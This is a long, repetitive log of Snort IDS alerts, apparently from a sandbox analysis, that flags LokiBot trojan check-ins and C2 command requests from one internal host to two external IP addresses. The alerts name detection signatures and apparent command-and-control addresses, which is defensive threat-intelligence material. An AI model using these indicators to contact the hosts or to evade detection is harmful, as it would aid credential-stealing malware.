              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49795 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49795 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49795 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49796 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49796 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49796 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49797 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49797 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49797 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49798 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49798 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49798 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49799 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49799 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49799 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49800 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49800 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49800 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49801 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49801 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49801 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49802 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49802 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49802 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49803 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49803 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49803 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49804 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49804 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49804 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49805 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49805 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49805 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49806 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49806 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49806 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49807 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49807 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49807 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49808 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49808 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49808 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49809 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49809 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49809 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49810 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49810 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49810 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49811 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49811 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49811 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49812 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49812 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49812 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49813 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49813 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49813 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49814 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49814 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49814 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49815 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49815 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49815 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49816 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49816 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49816 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49817 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49817 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49817 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49818 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49818 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49818 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49819 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49819 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49819 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49820 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49820 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49820 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49821 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49821 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49821 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49822 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49822 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49822 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49823 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49823 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49823 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49824 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49824 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49824 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49825 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49825 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49825 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49826 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49826 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49826 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49827 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49827 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49827 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49828 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49828 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49828 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49829 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49829 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49829 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49831 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49831 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49831 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49832 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49832 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49832 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49833 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49833 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49833 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49834 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49834 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49834 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49836 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49836 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49836 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49837 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49837 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49837 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49838 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49838 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49838 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49839 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49839 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49839 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49840 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49840 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49840 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49841 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49841 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49841 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49842 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49842 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49842 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49843 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49843 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49843 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49844 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49844 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49844 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49845 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49845 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49845 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49846 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49846 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49846 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49847 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49847 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49847 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49848 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49848 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49848 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49849 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49849 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49849 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49850 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49850 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49850 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49851 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49851 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49851 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49852 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49852 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49852 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49853 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49853 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49853 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49854 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49854 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49854 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49855 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49855 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49855 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49856 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49856 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49856 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49857 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49857 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49857 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49858 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49858 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49858 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49859 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49859 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49859 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49860 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49860 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49860 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49861 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49861 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49861 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49862 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49862 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49862 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49863 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49863 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49863 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49864 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49864 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49864 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49865 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49865 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49865 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49866 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49866 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49866 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49867 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49867 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49867 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49868 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49868 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49868 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49869 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49869 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49869 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49870 -> 172.67.155.45:80
